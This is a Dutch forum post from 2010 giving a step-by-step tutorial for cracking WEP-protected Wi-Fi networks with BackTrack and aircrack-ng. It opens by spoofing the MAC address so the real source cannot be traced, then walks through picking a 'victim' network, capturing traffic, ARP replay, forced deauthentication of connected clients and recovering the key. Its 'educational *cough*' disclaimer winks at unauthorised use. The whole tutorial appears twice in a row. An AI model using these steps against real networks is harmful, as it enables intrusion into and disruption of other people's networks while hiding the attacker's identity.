![[offline]](http://forum.nuttelozetroep.nl/global/www/templates/crisp-strict/_images/forum/offline.gif "offline")
Geplaatst op zondag 22 augustus 2010 12:42*BURP*
![[homepage]](http://forum.nuttelozetroep.nl/global/www/templates/crisp-strict/_images/forum/home.gif "Bekijk profiel van crashoverride"){kind=small}
![[show]](http://forum.nuttelozetroep.nl/global/www/templates/crisp-strict/_images/forum/admin_closed.gif "HideShow"){kind=small}
Nieuwe reeks: Klussen met Kijkers
Vandaag: WEP netwerken
In deze reeksen gaan we laten zijn dat beveiliging niet altijd alles is.
Let wel dat deze info as/if is, en daarom het gebruik van deze informatie ook alleen geschikt is voor leerzame *kuch* doeleinden.
Wat hebben we nodig:
* Een compatible Wifi NIC
* Een BackTrack install (live-cd of hdd-install)
* Geduld
* Enige vorm van kennis of Wifi, netwerken en linux
* Werkende internetverbinding (bekabeld / wifi)
Om te beginnen gaan weer eerst zorgen dat we ons MAC adres veranderen zodat de echte source niet te achterhalen is.
Stap 1: Macchanger
Open een terminal sessie (root)
Type het volgende in: apt-get install macchanger
Zorg dat de WLAN0 interface down is: ifconfig wlan0 down
Om het MAC adres aanpassen wordt de volgende syntax gebruikt:
./macchanger <parameters> wlan0
Forceer een specifiek MAC: ./macchanger --mac=01:23:45:67:89:AB wlan0
Forceer een volledig random MAC: ./macchanger -r wlan0
Start de WLAN0 interface: ifconfig wlan0 start
Nu is het originele MAC adres verborgen door een tijdelijk (!) MAC adres.
Bij een reboot (ook bij een HDD install) zal het originele adres weer teruggezet zijn.
Stap 2: Luisteren
We hebben ons MAC adres verborgen door een 'nep' adres.
Nu gaan we de WLAN0 interface in monitoring mode zetten:
airmon-ng start wlan0
Interface MON0 wordt nu aangemaakt, hierop luistert de WLAN0 interface.
Start het monitoren: airodump-ng mon0
Er verschijnt nu een lijst van netwerken met diverse info, zoals AP MAC, SSID, Channel, Beveiliging etc.
Dat zo er zo uit:
De kolom Data is heel erg belangrijk, aangezien hier ook de key handshakes in zitten.
Stap 3: Slachtoffer kiezen
Kies een netwerk met een WEP security setting.
Let op dat het er wel een is met een shown SSID.
Hidden SSID gaan we later in de serie doen
Stap 4: Aan de slag
Noteer de voglende gegevens:
ESSID = <SSID van het netwerk>
ap MAC = <MAC adres van het AP>
channel = <channel van het netwerk>
client MAC = <wlan0 MAC> (Let op: deze heb je eerder aangepast met macchanger)
Vul de benodigde gegevens in en voer het volgende commando uit:
airodump-ng --channel <channel> --write output --bssid <ap MAC> mon0
Hiermee loggen we de Beacons, IV's, etc etc naar een dump file genaamd output-01.cap
Open een nieuwe terminal naast de eerste.
We gaan nu wat ARP requests generen om zo meer data los te peuteren van het AP:
aireplay-ng --arpreplay -e <ESSID> -b <ap MAC> -h <client MAC> mon0
Laat deze sessie open staan....
Normaal krijg je geen nieuwe key update van het AP, dus gaan we zorgen dat we geforceerd disconnecten om zo een nieuwe key broadcast te krijgen.
aireplay-ng --deauth 10 -a <ap MAC> -c <client MAC> mon0
Als er veel gebruik gemaakt wordt van het betreffende AP zul je in de eerst sessie zien dat de Data kolom lekker door telt, hoe meer data hoe makkelijker / de WEP key achterhaald kan worden!
Stap 5: Resultaat
Als je aardig wat data verzamelt hebt, kun je met Aircrack proberen of je de key kunt uitlezen:
aircrack-ng output-01.cap
Let wel dat je minimaal 2500+ aan data nodig hebt, of je moet heel heel veel geluk hebben
Video tutorial hiervan kun je [url=http://g0tmi1k.blip.tv/file/3129452]hier[/url vinden
Vandaag: WEP netwerken
In deze reeksen gaan we laten zijn dat beveiliging niet altijd alles is.
Let wel dat deze info as/if is, en daarom het gebruik van deze informatie ook alleen geschikt is voor leerzame *kuch* doeleinden.
Wat hebben we nodig:
* Een compatible Wifi NIC
* Een BackTrack install (live-cd of hdd-install)
* Geduld
* Enige vorm van kennis of Wifi, netwerken en linux
* Werkende internetverbinding (bekabeld / wifi)
Om te beginnen gaan weer eerst zorgen dat we ons MAC adres veranderen zodat de echte source niet te achterhalen is.
Stap 1: Macchanger
Open een terminal sessie (root)
Type het volgende in: apt-get install macchanger
Zorg dat de WLAN0 interface down is: ifconfig wlan0 down
Om het MAC adres aanpassen wordt de volgende syntax gebruikt:
./macchanger <parameters> wlan0
Forceer een specifiek MAC: ./macchanger --mac=01:23:45:67:89:AB wlan0
Forceer een volledig random MAC: ./macchanger -r wlan0
Start de WLAN0 interface: ifconfig wlan0 start
Nu is het originele MAC adres verborgen door een tijdelijk (!) MAC adres.
Bij een reboot (ook bij een HDD install) zal het originele adres weer teruggezet zijn.
Stap 2: Luisteren
We hebben ons MAC adres verborgen door een 'nep' adres.
Nu gaan we de WLAN0 interface in monitoring mode zetten:
airmon-ng start wlan0
Interface MON0 wordt nu aangemaakt, hierop luistert de WLAN0 interface.
Start het monitoren: airodump-ng mon0
Er verschijnt nu een lijst van netwerken met diverse info, zoals AP MAC, SSID, Channel, Beveiliging etc.
Dat zo er zo uit:
De kolom Data is heel erg belangrijk, aangezien hier ook de key handshakes in zitten.
Stap 3: Slachtoffer kiezen
Kies een netwerk met een WEP security setting.
Let op dat het er wel een is met een shown SSID.
Hidden SSID gaan we later in de serie doen
Stap 4: Aan de slag
Noteer de voglende gegevens:
ESSID = <SSID van het netwerk>
ap MAC = <MAC adres van het AP>
channel = <channel van het netwerk>
client MAC = <wlan0 MAC> (Let op: deze heb je eerder aangepast met macchanger)
Vul de benodigde gegevens in en voer het volgende commando uit:
airodump-ng --channel <channel> --write output --bssid <ap MAC> mon0
Hiermee loggen we de Beacons, IV's, etc etc naar een dump file genaamd output-01.cap
Open een nieuwe terminal naast de eerste.
We gaan nu wat ARP requests generen om zo meer data los te peuteren van het AP:
aireplay-ng --arpreplay -e <ESSID> -b <ap MAC> -h <client MAC> mon0
Laat deze sessie open staan....
Normaal krijg je geen nieuwe key update van het AP, dus gaan we zorgen dat we geforceerd disconnecten om zo een nieuwe key broadcast te krijgen.
aireplay-ng --deauth 10 -a <ap MAC> -c <client MAC> mon0
Als er veel gebruik gemaakt wordt van het betreffende AP zul je in de eerst sessie zien dat de Data kolom lekker door telt, hoe meer data hoe makkelijker / de WEP key achterhaald kan worden!
Stap 5: Resultaat
Als je aardig wat data verzamelt hebt, kun je met Aircrack proberen of je de key kunt uitlezen:
aircrack-ng output-01.cap
Let wel dat je minimaal 2500+ aan data nodig hebt, of je moet heel heel veel geluk hebben
Video tutorial hiervan kun je [url=http://g0tmi1k.blip.tv/file/3129452]hier[/url vinden
"With the amount I drank last night I’d qualify for the special Olympics just for being vertical"